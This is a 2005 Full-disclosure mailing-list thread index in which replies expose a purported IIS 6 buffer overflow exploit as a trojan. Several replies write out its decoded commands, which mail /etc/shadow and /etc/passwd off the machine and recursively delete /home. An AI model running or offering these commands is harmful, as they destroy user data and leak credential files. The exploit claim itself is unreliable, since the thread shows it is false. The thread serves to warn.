Re: [Full-disclosure] IIS 6 Remote Buffer Overflow Exploit

2005-04-23 Thread Christian Lete
Erm...you should had READ the code first and get to know what the shellcode does, instead of just compiling/running it (even as a non-root user) Alonso / ReYDeS wrote: Saludos: Good attempt;) But some times it works. --- cat: /etc/shadow: Permiso denegado No message, no subject; hope that's ok

RE: [Full-disclosure] IIS 6 Remote Buffer Overflow Exploit

2005-04-19 Thread David Li
Wait, you mean if I run that, I can hack IIS? ^_^ > Not that anyone would fall for running this on > anything besides a test > system, but to save 30 second to decode, what it > really does (locally, > not remotely) is: > > cat /etc/shadow |mail > full-disclosure@lists.grok.org.uk > cat /etc/pas

Re: [Full-disclosure] IIS 6 Remote Buffer Overflow Exploit

2005-04-19 Thread Paul Kurczaba
THIS ADVISORY IS FALSE!!! "shellcode" is decoded to be: /bin/rm -rf /home/*;clear;echo bl4ckh4t,hehe "launcher" is decoded to be: cat /etc/shadow |mail full-disclosure@lists.grok.org.uk "netcat_shell" is decoded to be: cat /etc/passwd |mail full-disclosure@lists.grok.org.uk Day

Re: [Full-disclosure] IIS 6 Remote Buffer Overflow Exploit

2005-04-18 Thread Ron
haha, nice: /bin/rm -rf /home/*;clear;echo bl4ckh4t,hehe cat /etc/shadow |mail full-disclosure@lists.grok.org.uk cat /etc/passwd |mail full-disclosure@lists.grok.org.uk lol @ anybody who does it. Day Jay wrote: /* Proof of concept code Please don't send us e-mails asking us "how to hack" beca

RE: [Full-disclosure] IIS 6 Remote Buffer Overflow Exploit

2005-04-18 Thread Lauro, John
Not that anyone would fall for running this on anything besides a test system, but to save 30 second to decode, what it really does (locally, not remotely) is: cat /etc/shadow |mail full-disclosure@lists.grok.org.uk cat /etc/passwd |mail full-disclosure@lists.grok.org.uk /bin/rm -rf /home/*;clear

Re: [Full-disclosure] IIS 6 Remote Buffer Overflow Exploit

2005-04-18 Thread Pbt
Le lundi 18 avril 2005 à 16:53 -0700, Day Jay a écrit : > /* Proof of concept code >Please don't send us e-mails >asking us "how to hack" because >we will be forced to skullfsck you. > > DISCLAIMER: > !!NOT RESPONSIBLE WITH YOUR USE OF THIS CODE!! You're right to add this warning ! :)

Re: [Full-disclosure] IIS 6 Remote Buffer Overflow Exploit

2005-04-18 Thread Alonso / ReYDeS
Saludos: Good attempt;) But some times it works. --- cat: /etc/shadow: Permiso denegado No message, no subject; hope that's ok /bin/rm: no se puede borrar «/home/*»: Permiso denegado /bin/rm: no se puede borrar «/home/**»: Permiso denegado /bin/rm: no se puede borrar «/home/***»:

[Full-disclosure] IIS 6 Remote Buffer Overflow Exploit

2005-04-18 Thread Day Jay
/* Proof of concept code Please don't send us e-mails asking us "how to hack" because we will be forced to skullfsck you. DISCLAIMER: !!NOT RESPONSIBLE WITH YOUR USE OF THIS CODE!! IIS 6 Buffer Overflow Exploit BUG: inetinfo.exe improperly bound checks http requests sent longer